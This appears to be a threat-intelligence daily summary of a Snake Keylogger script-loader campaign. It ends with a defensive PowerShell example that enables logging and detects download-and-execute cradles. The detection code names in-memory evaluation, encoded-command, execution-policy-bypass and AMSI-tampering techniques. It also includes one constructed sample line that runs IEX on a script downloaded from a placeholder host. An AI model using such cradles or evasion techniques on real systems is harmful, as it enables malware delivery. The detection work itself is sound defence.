Daily Summary
Today’s count of 11 samples sits 67% above the 7-day average (roughly 7 samples per day), continuing an upward trend. The surge is notable for its consistency across the week: no single day’s spike is driving the average higher. This sustained activity points to an ongoing campaign rather than a short-term burst.
New Samples Detected
PowerShell scripts dominate today, accounting for 6 of the 11 samples, a shift from the typical balanced mix of .ps1 and .bat files. The remaining samples are 4 .bat scripts and 1 JavaScript file. The .js file is a deviation from recent patterns and may be an attempt to slip past email security filters that treat .js attachments differently from .ps1 and .bat. No change in obfuscation was observed, but note that a .js loader runs under the Windows Script Host (wscript.exe or cscript.exe) rather than powershell.exe or cmd.exe, so detections keyed only on those two hosts will not see it.
Distribution Methods
File type distribution heavily favors script-based delivery via email, most likely phishing attachments or links to hosted script files. The absence of compiled executables suggests the attackers are relying on living-off-the-land binaries (LOLBins) such as PowerShell and cmd.exe to download and execute the payload; the scripts act as stage-one loaders, with the Snake Keylogger binary fetched afterwards. The single .js sample may be delivered through a different vector, such as a redirected download from a compromised website.
Detection Rate
Current detection rates for today’s samples remain moderate: most AV engines detect the core Snake Keylogger payload but show lower coverage for the script wrappers. The .js variant may have reduced detection because .js loaders are less common in this campaign, whereas signatures for the PowerShell and batch file loaders are well established.
C2 Infrastructure
No new C2 servers were recorded today, indicating the threat actor is reusing existing infrastructure. Infrastructure reuse while sample volume rises suggests the actor is scaling delivery on what it already has rather than rotating C2. Continue monitoring previously known C2 IPs and domains for changes in encryption keys or callback patterns.
7-Day Trend
Activity has been rising steadily, with today’s 11 samples marking the highest single-day count in the past week. The upward trajectory suggests the campaign is gaining momentum rather than peaking.
Security Analysis
A non-obvious observation: the increase in .ps1 samples relative to .bat files is unlikely to be about execution policy or User Account Control. PowerShell’s execution policy is not a security boundary (a loader simply passes -ExecutionPolicy Bypass or pipes script text into the interpreter) and it has no bearing on UAC, which governs elevation. A more plausible reason is that PowerShell lets the loader fetch and run the next stage entirely in memory, for example by calling Invoke-Expression on downloaded text, whereas a .bat file must hand off to another interpreter to do the same. Attackers may be testing which script handler yields better success rates before committing to a mix. Defensive recommendation: enable PowerShell script block logging (Event ID 4104) and module logging on endpoints, and pilot Constrained Language Mode. Be aware that ConstrainedLanguage is only enforced reliably through a WDAC or AppLocker policy (a session-level setting is undone by starting a new process) and that it does break administrative scripts that rely on arbitrary .NET or COM types, so test it on a pilot group before broad rollout.
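The following is an added example, not code from the report or from any vendor; it shows the logging configuration recommended above and a sweep of the resulting 4104 events for the download-and-execute cradles described under Distribution Methods. The registry paths are the ones Group Policy writes for PowerShell logging; the transcript share path, the regex patterns and the sample script block texts are this example’s own assumptions, not Snake Keylogger indicators. Run it in an elevated PowerShell session.

```powershell
# Added example, not part of the original report. Run elevated.

$policyRoot = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell'

# Script block logging: writes Event ID 4104 to Microsoft-Windows-PowerShell/Operational
$sbl = Join-Path $policyRoot 'ScriptBlockLogging'
New-Item -Path $sbl -Force | Out-Null
Set-ItemProperty -Path $sbl -Name 'EnableScriptBlockLogging' -Value 1 -Type DWord

# Module logging for every module: writes Event ID 4103 (pipeline execution detail)
$ml = Join-Path $policyRoot 'ModuleLogging'
New-Item -Path (Join-Path $ml 'ModuleNames') -Force | Out-Null
Set-ItemProperty -Path $ml -Name 'EnableModuleLogging' -Value 1 -Type DWord
Set-ItemProperty -Path (Join-Path $ml 'ModuleNames') -Name '*' -Value '*' -Type String

# Transcription: full session text, including output, to a share you control (assumed path)
$tr = Join-Path $policyRoot 'Transcription'
New-Item -Path $tr -Force | Out-Null
Set-ItemProperty -Path $tr -Name 'EnableTranscripting' -Value 1 -Type DWord
Set-ItemProperty -Path $tr -Name 'EnableInvocationHeader' -Value 1 -Type DWord
Set-ItemProperty -Path $tr -Name 'OutputDirectory' -Value '\\logsrv.example.invalid\ps-transcripts$' -Type String

# 'FullLanguage' here means nothing is constraining this host. ConstrainedLanguage is
# only enforced reliably by a WDAC or AppLocker policy; a session-level setting is
# undone by starting a new powershell.exe.
"Current language mode: $($ExecutionContext.SessionState.LanguageMode)"

# Indicator categories for download-and-execute cradles (assumed patterns, case-insensitive).
$cradlePatterns = [ordered]@{
    Eval     = '\bIEX\b|Invoke-Expression|\[ScriptBlock\]::Create'
    Download = 'DownloadString|DownloadFile|DownloadData|Invoke-WebRequest|\biwr\b|Invoke-RestMethod|\birm\b|Start-BitsTransfer'
    Decode   = 'FromBase64String|-e(?:nc?|ncodedcommand)?\s+[A-Za-z0-9+/=]{16,}'
    Hidden   = '-w(?:in(?:dowstyle)?)?\s+hidden'
    Bypass   = '-e(?:p|xecutionpolicy)\s+bypass'
    Amsi     = 'AmsiUtils|amsiInitFailed'
}

function Get-CradleIndicators {
    # Returns the names of the categories a script block text matches.
    param([Parameter(Mandatory)][string]$ScriptBlockText)
    @($cradlePatterns.Keys | Where-Object { $ScriptBlockText -match $cradlePatterns[$_] })
}

function Find-SuspiciousScriptBlocks {
    # Sweeps 4104 events from the last $Hours hours. A single Invoke-WebRequest is normal
    # admin traffic, so a block is reported only when two or more categories match.
    # Note: long script blocks are split across several 4104 events (MessageNumber/MessageTotal),
    # so a cradle spanning a split may need the fragments joined by ScriptBlockId first.
    param([int]$Hours = 24)
    $filter = @{
        LogName   = 'Microsoft-Windows-PowerShell/Operational'
        Id        = 4104
        StartTime = (Get-Date).AddHours(-$Hours)
    }
    Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue | ForEach-Object {
        $text = [string]$_.Properties[2].Value   # Properties[2] is ScriptBlockText in a 4104 event
        $hits = Get-CradleIndicators -ScriptBlockText $text
        if ($hits.Count -ge 2) {
            [pscustomobject]@{
                Time       = $_.TimeCreated
                Categories = ($hits -join ', ')
                Snippet    = $text.Substring(0, [Math]::Min(120, $text.Length))
            }
        }
    }
}

# Constructed sample script block texts (not real samples) to show the scoring offline.
$samples = @(
    "Get-ChildItem -Path C:\Logs -Filter *.evtx | Sort-Object LastWriteTime",
    "`$c=New-Object Net.WebClient;IEX `$c.DownloadString('http://files.example.invalid/s.ps1')"
)
foreach ($s in $samples) {
    $hits = Get-CradleIndicators -ScriptBlockText $s
    "{0,-10} {1}" -f "[$($hits.Count)]", $s   # first sample matches 0 categories, second matches Eval and Download
}

# Live sweep of the local host's 4104 events from the last day.
Find-SuspiciousScriptBlocks -Hours 24 | Format-Table -AutoSize
```

The registry values above are the same ones the Group Policy templates write, so applying them via GPO is equivalent and preferable at scale. Keep the two-category threshold rather than alerting on any single match: most of the individual patterns appear in legitimate automation, and the signal in these loaders is the combination of a fetch with an in-memory evaluation, decoding or host-hiding flag.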